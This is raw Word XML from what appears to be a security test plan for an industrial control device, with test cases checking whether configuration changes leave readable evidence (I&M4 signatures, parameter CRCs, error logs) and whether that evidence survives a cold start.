          <w:p w14:paraId="76C090ED" w14:textId="77777777" w:rsidR="007E1F53"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366B91A7" w14:textId="5A9DE755" w:rsidR="00900880" w:rsidRPr="006D5B99"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lang w:val="en-US"/>
              </w:rPr>
              <w:t>NIST SP 800-115 §3.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="867" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57BF7E98" w14:textId="7C106F48"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7E1F53" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00900880" w:rsidRPr="006D5B99" w14:paraId="63227B5F"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0BF551B5" w14:textId="77777777" w:rsidR="00900880" w:rsidRPr="006D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D4C36CA" w14:textId="14EA6ED8" w:rsidR="00900880" w:rsidRPr="006D5B99"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Change one iPar; capture I&amp;M4 delta; cold-start and re-read; check for time/actor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FDEB966" w14:textId="2A8C053D" w:rsidR="009802A5" w:rsidRPr="006D5B99" w:rsidRDefault="007E50D2" w:rsidP="00224965">
            <w:pPr>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 G-2 and settles G-3 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F2F040D" w14:textId="0B5D1CA4" w:rsidR="00900880" w:rsidRPr="006D5B99"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p w14:paraId="2E7B6BFA" w14:textId="77777777" w:rsidR="00336E8E" w:rsidRPr="006D5B99"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867" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FEA1B34" w14:textId="3F9C9F81" w:rsidR="00A92572"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A3D544" w14:textId="77777777" w:rsidTr="00205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 w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CE3D16A" w14:textId="77777777" w:rsidR="00900880" w:rsidRPr="006D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1268EBEC" w14:textId="36B2B7F1"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Actor-delegation analysis: </w:t>
            </w:r>
            <w:r w:rsidR="007E50D2" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>authorized</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> config change; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C38A191" w14:textId="77777777" w:rsidR="00B2493F"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confirm the device holds no actor identity; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AE5AA8D" w14:textId="7E6B10A1" w:rsidR="00900880" w:rsidRPr="006D5B99"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attribution exists only in the </w:t>
            </w:r>
            <w:r w:rsidR="00756315" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PLC</w:t>
            </w:r>
            <w:r w:rsidR="007819E9" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">/ </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>engineering project</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27CC8AF0" w14:textId="6E328FAD" w:rsidR="00900880" w:rsidRPr="006D5B99"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618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CFAD700" w14:textId="24BECD2C" w:rsidR="00900880" w:rsidRPr="006D5B99"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NIST SP 800-115 §3.1/§3.2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="867" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E171595" w14:textId="2FD64B7D" w:rsidR="00900880" w:rsidRPr="006D5B99"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2A4F783D" w14:textId="77777777" w:rsidTr="00205C70">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="375" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="563946FA" w14:textId="77777777" w:rsidR="00900880" w:rsidRPr="006D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F2F1D04" w14:textId="77777777" w:rsidR="0035412A"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Post-param-end write-gate: attempt an acyclic config write after param-end; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E64C447" w14:textId="2BC63D6C" w:rsidR="00900880" w:rsidRPr="006D5B99"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rejection and absence of an evidence entry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29BDA998" w14:textId="77777777" w:rsidR="0035412A"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Validates temporal write-gate; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2ACAC15E" w14:textId="7D7918E9" w:rsidR="00900880" w:rsidRPr="006D5B99"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no-evidence-on-block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E1E8F00" w14:textId="77777777" w:rsidR="00F80BCC"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OWASP ISTG-DES; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A1DCEC2" w14:textId="43CA9763"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6D5B99">
              <w:t>NIST SP 800-115 §5.2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F690A71" w14:textId="77777777" w:rsidR="00A92572" w:rsidRPr="006D5B99"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867" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BC25BFB" w14:textId="1EF68711" w:rsidR="00900880" w:rsidRPr="006D5B99"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268C0CB5" w14:textId="77777777" w:rsidR="00600487" w:rsidRPr="006D5B99" w:rsidRDefault="00600487" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0256F214" w14:textId="77777777" w:rsidR="00600487" w:rsidRPr="006D5B99" w:rsidRDefault="00600487" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F780D5C" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 3 - Two-Level Test Catalog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D566CCC" w14:textId="77777777" w:rsidR="009712CC" w:rsidRPr="006D5B99" w:rsidRDefault="009712CC" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F9630E5" w14:textId="48489673" w:rsidR="009712CC" w:rsidRPr="006D5B99" w:rsidRDefault="009712CC" w:rsidP="009712CC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E18BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="magenta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ009-01 - Config-Modification Evidence Surface Baseline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC5E903" w14:textId="77777777" w:rsidR="00A92572" w:rsidRPr="006D5B99" w:rsidRDefault="00A92572" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B9ABF8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11229C9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45EB4DF0" w14:textId="2C6C6D9B" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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3.4 / CR 6.1 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="sv-SE"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset B, Asset I</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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154BF356" w14:textId="26A2C65A" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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B73A1A" w:rsidRPr="006D5B99"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7608F924" w14:textId="0AEC321A" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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EF97250" w14:textId="77777777" w:rsidR="00021536"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which configuration-modification evidence mechanisms exist and are readable (the parameter-change counter, the configuration signature, and the audit log);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="402F8C37" w14:textId="5D966DA6" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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inspect each for actor identity and absolute timestamp. Firmware-modification evidence </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RQ-008.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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479ACA84" w14:textId="77777777" w:rsidR="00A662E3"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audit log, the change counter, and the configuration signature at a known baseline.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EB51269" w14:textId="1858122E" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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which fields carry identity/timestamp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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29FB64C8" w14:textId="77777777" w:rsidR="00393331"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(partial baseline) if config-modification indicators are readable. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="468B9B0B" w14:textId="5612CAD0" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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shortfall where no field carries actor identity or absolute timestamp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="300BFCC7" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00B73A1A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56ED2FBD"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051665D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28909EF6" w14:textId="7C06E189" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="004F33E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TC-RQ009-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D2958" w:rsidRPr="006D5B99"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1D2958" w:rsidRPr="006D5B99" w:rsidRDefault="001D2958" w:rsidP="001D2958">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39C53873" w14:textId="08CCEF4E" w:rsidR="001D2958" w:rsidRPr="006D5B99" w:rsidRDefault="001D2958" w:rsidP="001D2958">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Kali (curl), TIA laptop (I&amp;M4/iParCRC display)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D2958" w:rsidRPr="006D5B99"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1D2958" w:rsidRPr="006D5B99" w:rsidRDefault="001D2958" w:rsidP="001D2958">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A20C2BB" w14:textId="64BB843C" w:rsidR="001D2958" w:rsidRPr="006D5B99" w:rsidRDefault="001D2958" w:rsidP="001D295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1D2958" w:rsidRPr="006D5B99"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1D2958" w:rsidRPr="006D5B99" w:rsidRDefault="001D2958" w:rsidP="001D2958">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="192E621C" w14:textId="77777777" w:rsidR="001D2958" w:rsidRPr="006D5B99" w:rsidRDefault="001D2958" w:rsidP="001D295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376947B" w14:textId="68214DB4" w:rsidR="001D2958" w:rsidRPr="006D5B99" w:rsidRDefault="001D2958" w:rsidP="001D295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cm_rq009-01_errorlog.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="172AF107" w14:textId="77777777" w:rsidR="001D2958" w:rsidRPr="006D5B99" w:rsidRDefault="001D2958" w:rsidP="001D295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Online &amp; Diagnostics &gt; Identification &amp; Maintenance &gt; I&amp;M4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="656D51D0" w14:textId="77777777" w:rsidR="001D2958" w:rsidRPr="006D5B99" w:rsidRDefault="001D2958" w:rsidP="001D295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(record the signature value: F_iParCRC + F_Par_CRC as hex)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28C2CC46" w14:textId="2DE88236" w:rsidR="001D2958" w:rsidRPr="006D5B99" w:rsidRDefault="001D2958" w:rsidP="001D2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both sources for any actor-identity field or absolute timestamp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D2958" w:rsidRPr="006D5B99"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1D2958" w:rsidRPr="006D5B99" w:rsidRDefault="001D2958" w:rsidP="001D2958">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="474C1FF0" w14:textId="4BD82FCD" w:rsidR="001D2958" w:rsidRPr="006D5B99" w:rsidRDefault="001D2958" w:rsidP="001D2958">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected: parameter-change indicators (iParCRC value) are readable, but without actor identity/timestamp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E1593B4" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BE0D088" w14:textId="0B2FB238" w:rsidR="00961DBA" w:rsidRPr="006D5B99" w:rsidRDefault="00961DBA" w:rsidP="003A144C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ009-02 - Config-Modification Evidence &amp; Asymmetric</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DB831D" w14:textId="77777777" w:rsidR="00961DBA" w:rsidRPr="006D5B99" w:rsidRDefault="00961DBA" w:rsidP="003A144C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F37CD4C" w14:textId="3AACCA59" w:rsidR="003A144C" w:rsidRPr="006D5B99" w:rsidRDefault="003A144C" w:rsidP="003A144C">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6D5B99" w:rsidRDefault="003A144C" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4387F26F"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692527FD" w14:textId="49232E5D" w:rsidR="003A144C" w:rsidRPr="006D5B99"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RQ-009 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="sv-SE"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 2.8 / CR 2.11 / CR 3.9 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="sv-SE"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset B, Asset I</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A144C" w:rsidRPr="006D5B99"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CD382AC" w14:textId="3703F1CD" w:rsidR="003A144C" w:rsidRPr="006D5B99"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211886E6" w14:textId="5ACE5FE4" w:rsidR="003A144C" w:rsidRPr="006D5B99"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913F8E" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D72232" w:rsidRPr="006D5B99"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D72232" w:rsidRPr="006D5B99" w:rsidRDefault="00D72232" w:rsidP="00D72232">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6589E7B3" w14:textId="0D701545" w:rsidR="00D72232" w:rsidRPr="006D5B99" w:rsidRDefault="00D72232" w:rsidP="00D7223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Demonstrate that a configuration/parameter-modification event produces an asymmetric evidence trail: the parameter-change fingerprint (I&amp;M4 signature / iParCRC-F_ParCRC)</w:t>
            </w:r>
            <w:r w:rsidR="00B92FD8" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Error-Log entry describing WHEN and HOW the change was applied does not</w:t>
            </w:r>
            <w:r w:rsidR="00B92FD8" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>leaving a permanent fingerprint without context, and a contextual log entry that is lost.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D72232" w:rsidRPr="006D5B99"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D72232" w:rsidRPr="006D5B99" w:rsidRDefault="00D72232" w:rsidP="00D72232">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59ED0F56" w14:textId="4BFD8D7F"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Read the I&amp;M4 signature and the Error Log at baseline.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76724A87" w14:textId="6854FA81"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Perform an authorized parameter change (via the engineering tool) and record the resulting I&amp;M4 signature and any generated log entry.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19A219A7" w14:textId="5F12CC5A" w:rsidR="00D72232" w:rsidRPr="006D5B99" w:rsidRDefault="00D72232" w:rsidP="00D72232">
            <w:pPr>
              <w:pStyle w:val="Listenabsatz"/>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Cold-start the device.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2274DE" w14:textId="39054054" w:rsidR="00D72232" w:rsidRPr="006D5B99" w:rsidRDefault="00D72232" w:rsidP="00D72232">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="70"/>
              </w:numPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Re-read the I&amp;M4 signature and the Error Log; compare persistence of both indicators across the reset.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D72232" w:rsidRPr="006D5B99"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D72232" w:rsidRPr="006D5B99" w:rsidRDefault="00D72232" w:rsidP="00D72232">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74E573DA" w14:textId="41072959" w:rsidR="00D72232" w:rsidRPr="006D5B99" w:rsidRDefault="00D72232" w:rsidP="00D72232">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color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected gap-characterization result: the I&amp;M4 signature</w:t>
            </w:r>
            <w:r w:rsidR="00F657B6" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Error-Log entry documenting the change is cleared by the cold start</w:t>
            </w:r>
            <w:r w:rsidR="00F657B6" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> confirming an asymmetric, incomplete evidence trail for configuration modifications.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C548E1D" w14:textId="77777777" w:rsidR="003A144C" w:rsidRPr="006D5B99" w:rsidRDefault="003A144C" w:rsidP="003A144C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12DCC4B5"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69427B9B"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2C952777" w14:textId="01385D6C" w:rsidR="003A144C" w:rsidRPr="006D5B99" w:rsidRDefault="005718C9"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TC-RQ009-02</w:t>
            </w:r>
          </w:p>
